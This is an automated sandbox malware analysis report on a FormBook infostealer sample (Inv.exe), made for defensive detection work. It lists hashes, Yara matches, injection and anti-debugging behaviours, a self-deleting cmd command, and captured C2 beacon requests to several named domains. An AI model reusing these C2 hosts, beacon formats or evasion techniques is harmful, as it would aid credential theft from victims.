Analysis Report Inv.exe

Overview

General Information

Sample Name: Inv.exe
Analysis ID: 339347
MD5: a3aba7d40da6c8c86e4e8d035803f314
SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Inv.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
    • Inv.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6460 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6740 cmdline: /c del 'C:\Users\user\Desktop\Inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      0.2.Inv.exe.d90000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        0.2.Inv.exe.d90000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        0.2.Inv.exe.d90000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        0.2.Inv.exe.d90000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.Inv.exe.d90000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: Inv.exe, Avira: detected
          Found malware configuration
          Source: 0.2.Inv.exe.d90000.1.unpack, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Inv.exe, Virustotal: Detection: 39%
          Source: Inv.exe, ReversingLabs: Detection: 45%
          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: Inv.exe, Joe Sandbox ML: detected
          Source: 0.2.Inv.exe.d90000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Inv.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Inv.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Inv.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop esi, 1_2_004172FA
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop ebx, 1_2_00407B05
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop edi, 1_2_0040E44D
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 4x nop then pop edi, 1_2_00417D80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 4_2_003672FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 4_2_00357B05
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 4_2_0035E44D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 4_2_00367D80

          Networking:

          Uses netstat to query active network connections and open ports
          Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1
            Host: www.millcityloam.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1
            Host: www.achonabu.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1
            Host: www.a-zsolutionsllc.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1
            Host: www.nationshiphop.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, IP Address: 198.54.117.217
          Source: Joe Sandbox View, ASN Name: GOOGLEUS
          Source: Joe Sandbox View, ASN Name: SINGLEHOP-LLCUS
          Source: unknown, DNS traffic detected: queries for: www.millcityloam.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            X-Powered-By: PHP/5.6.40
            Content-Type: text/html; charset=UTF-8
            X-UA-Compatible: IE=edge
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
            X-LiteSpeed-Cache-Control: public,max-age=3600
            X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
            X-Litespeed-Cache: miss
            Transfer-Encoding: chunked
            Date: Wed, 13 Jan 2021 20:27:17 GMT
            Server: LiteSpeed
          Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A060 NtClose,1_2_0041A060
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,1_2_0041A110
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419F30 NtCreateFile,1_2_00419F30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FE0 NtReadFile,1_2_00419FE0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A08A NtAllocateVirtualMemory,1_2_0041A08A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDA NtReadFile,1_2_00419FDA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDC NtReadFile,1_2_00419FDC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk,1_2_019899A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01989910
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_019898F0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk,1_2_01989840
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01989860
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01989A00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk,1_2_01989A20
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk,1_2_01989A50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895D0 NtClose,LdrInitializeThunk,1_2_019895D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989540 NtReadFile,LdrInitializeThunk,1_2_01989540
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk,1_2_01989780
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_019897A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk,1_2_01989710
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_019896E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01989660
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899D0 NtCreateProcessEx,1_2_019899D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989950 NtQueueApcThread,1_2_01989950
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898A0 NtWriteVirtualMemory,1_2_019898A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989820 NtEnumerateKey,1_2_01989820
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198B040 NtSuspendThread,1_2_0198B040
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A3B0 NtGetContextThread,1_2_0198A3B0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989B00 NtSetValueKey,1_2_01989B00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A80 NtOpenDirectoryObject,1_2_01989A80
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A10 NtQuerySection,1_2_01989A10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895F0 NtQueryInformationFile,1_2_019895F0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198AD30 NtSetContextThread,1_2_0198AD30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989520 NtWaitForSingleObject,1_2_01989520
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989560 NtWriteFile,1_2_01989560
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989FE0 NtCreateMutant,1_2_01989FE0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A710 NtOpenProcessToken,1_2_0198A710
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989730 NtQueryVirtualMemory,1_2_01989730
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989770 NtSetInformationFile,1_2_01989770
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A770 NtOpenThread,1_2_0198A770
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989760 NtOpenProcess,1_2_01989760
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896D0 NtCreateKey,1_2_019896D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989610 NtEnumerateValueKey,1_2_01989610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk,4_2_02E59A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02E59860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk,4_2_02E59840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk,4_2_02E599A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02E59910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02E596E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk,4_2_02E596D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02E59660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk,4_2_02E59650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk,4_2_02E59FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk,4_2_02E59780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk,4_2_02E59710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595D0 NtClose,LdrInitializeThunk,4_2_02E595D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59540 NtReadFile,LdrInitializeThunk,4_2_02E59540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A80 NtOpenDirectoryObject,4_2_02E59A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A20 NtResumeThread,4_2_02E59A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A00 NtProtectVirtualMemory,4_2_02E59A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A10 NtQuerySection,4_2_02E59A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A3B0 NtGetContextThread,4_2_02E5A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59B00 NtSetValueKey,4_2_02E59B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598F0 NtReadVirtualMemory,4_2_02E598F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598A0 NtWriteVirtualMemory,4_2_02E598A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5B040 NtSuspendThread,4_2_02E5B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59820 NtEnumerateKey,4_2_02E59820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599D0 NtCreateProcessEx,4_2_02E599D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59950 NtQueueApcThread,4_2_02E59950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59670 NtQueryInformationProcess,4_2_02E59670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59610 NtEnumerateValueKey,4_2_02E59610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E597A0 NtUnmapViewOfSection,4_2_02E597A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59760 NtOpenProcess,4_2_02E59760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A770 NtOpenThread,4_2_02E5A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59770 NtSetInformationFile,4_2_02E59770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59730 NtQueryVirtualMemory,4_2_02E59730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A710 NtOpenProcessToken,4_2_02E5A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595F0 NtQueryInformationFile,4_2_02E595F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59560 NtWriteFile,4_2_02E59560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59520 NtWaitForSingleObject,4_2_02E59520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5AD30 NtSetContextThread,4_2_02E5AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A060 NtClose,4_2_0036A060
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A110 NtAllocateVirtualMemory,4_2_0036A110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369F30 NtCreateFile,4_2_00369F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FE0 NtReadFile,4_2_00369FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A08A NtAllocateVirtualMemory,4_2_0036A08A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDC NtReadFile,4_2_00369FDC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDA NtReadFile,4_2_00369FDA
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123BFC3 appears 38 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236EF1 appears 84 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01239160 appears 64 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236F06 appears 36 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01237021 appears 40 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0194B150 appears 35 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123715C appears 370 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02E1B150 appears 66 times
          Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
